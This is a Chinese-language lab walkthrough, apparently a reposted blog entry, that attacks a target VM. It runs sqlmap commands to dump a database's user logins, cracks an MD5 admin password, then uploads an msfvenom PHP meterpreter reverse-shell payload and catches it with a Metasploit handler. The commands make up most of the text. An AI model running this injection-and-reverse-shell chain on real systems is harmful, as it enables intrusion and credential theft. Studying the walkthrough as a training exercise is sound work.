GET sql注入


靶机地址:192.168.43.156
攻击机地址:192.168.43.89
一、AppScan检查靶机sql漏洞

 

 

二、使用sqlmap利用SQL注入漏洞
1.sqlmap -u " http://192.168.43.156/cat.php?id=1" –dbs 查看数据库名

 

 

2.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" --tables 表名

 

 

3.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" --columns 查看字段

 

 

4.sqlmap -u " http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" -C "login" --dump

 

 

用同种方法查找密码
三、建立反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw

 

 

在桌面建一个文件shell.php

 

 

四、登录后台页面
刚在数据库拿到的用户名:admin
密码需要用MD5解密为: P4ssw0rd

 

 

 

 

 

在kali系统内
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在页面运行shell就可以就如靶机
 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM